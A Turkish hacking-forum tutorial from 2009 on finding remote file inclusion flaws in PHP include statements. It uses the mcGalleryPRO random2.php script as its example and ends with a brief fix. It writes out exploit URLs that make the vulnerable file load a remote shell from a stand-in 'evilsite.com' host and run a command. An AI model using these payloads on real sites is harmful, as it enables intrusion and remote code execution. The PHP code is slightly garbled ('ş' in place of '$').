Derebahçe ~ GençliK
Hoşgeldiniz !
Üye olmadan forumdan yarar sağlayamazsınız.
Canlı konuşma için sitede başlık sayfasının altındaki chat box'a konuşabilirsiniz !
Moderatör Alımları Başlamıştır.
İyi Eğlenceler..



 
AnasayfaaFFéTméZ ~ TéaMKayıt OlGiriş yap

Paylaş | 
 

 [# RFI Açığı Arama ] Bırakın Hazır Açıkları, Açığı Kendiniz Yaratın !

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
By.BiCi
Admin
Admin


Rep Gücü : 401
Rep Puanı : 10

MesajKonu: [# RFI Açığı Arama ] Bırakın Hazır Açıkları, Açığı Kendiniz Yaratın !   Salı Mart 17, 2009 9:58 pm

[# RFI Açığı Arama ]

Hacker’ların RFI açığı ararken dikkat ettikleri başlıca parametreleri şöyle sıralayabiliriz;


- İnclude

- Require

- Define

Bu yönergelerin kullanımı sırasında "ş" tanım işareti ile kullanılan parametreler yardımıyla uzaktan kod çağırılabiliyor.

Örnek olarak aşağıdaki kodu ele alalım:
Kod:
include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );

ukarıdaki kodlar mcGalleryPRO scriptinden alınmıştır.kurulum paketindeki random2.php dosyasındaki hatalı kodlamadan dolayı uzaktan dosya çağırmak mümkündür.şimdi burda başında ş işareti olan parametrelere dikkatinizi çekmek istiyorum.



path_to_folder ve lang_def... ilk parametreyi kullanarak rfi yapılabilmektedir.nedeni bu değişkenin daha önce sabit bir değere eşitlenmemiş olmasıdır.dolayısıyla bu değişkene atıyacağınız her hangi bir değer onun değerini belirler.


bu kodla örnek rfi yi oluşturalım :

http://www.victimsite.com/mcGalleryPRO_dir/random2.php?path_to_folder=http://evilsite.com/shell.txt?cmd=id

Bu şekilde bir Rfi’nin varsayılan ayarlarda bir değişiklik yapılmamışsa çalışması beklenir.

Peki aynı şey lang_def için mümkün müdür? Tabii ki hayır... Çünkü dikkatinizi çektiyse lang_def değişkeninden önce sırada /lang klasörü vardır.Eğer siz;

http://www.victimsite.com/mcGalleryPRO_dir/random2.php?lang_def=http://evilsite.com/shell.txt?cmd=id

...şeklinde bir rfi yapmak isterseniz;bu kodu çağırdığınızda gezgininiz /lang klasörün altında çağıracağınız kodu arar.şimdi ilk değişkenimize geri dönelim..

gördüğünüz gibi bu bir açık yani "bug" dır.peki kapatılması mümkün mü?Elbette..

örnek olarak bir fixing yapalım:


Kod:

şpath_to_folder = "./" ;

Kod:


include ("şpath_to_folder/admin/common.php" );

include ("şpath_to_folder/lang/şlang_def" );


Basit olarak random2.php dosyasının böyle kodlandığını varsayarsak rfi yapamayacağımızı görürüz.çünkü path_to_folder değişkenine bir değer atanmış ve çağırılmak istenen dosyanın ./ yani public_html ya da httpdocs gibi sitenin root klasöründe aranması işaret edilmiştir.


__________________
Zaferdir Ancak Bize Yakışan


Meydan Boş ..

Yerimi Dolduracak Kişiye Başarılar ..

Sayfa başına dön Aşağa gitmek
 
[# RFI Açığı Arama ] Bırakın Hazır Açıkları, Açığı Kendiniz Yaratın !
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Batista Gelecek Ay Bırakıyor
» RAKİPLERİMİZİ TANIYALIM!
» Arabam ve ona yaptıklarım
» İnsan Vücudu Mineral deposu
» SBS Kayıtları Hakkında Bilgi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Derebahçe ~ GençliK :: Hacking area :: Web-Domain Hacking-
Buraya geçin: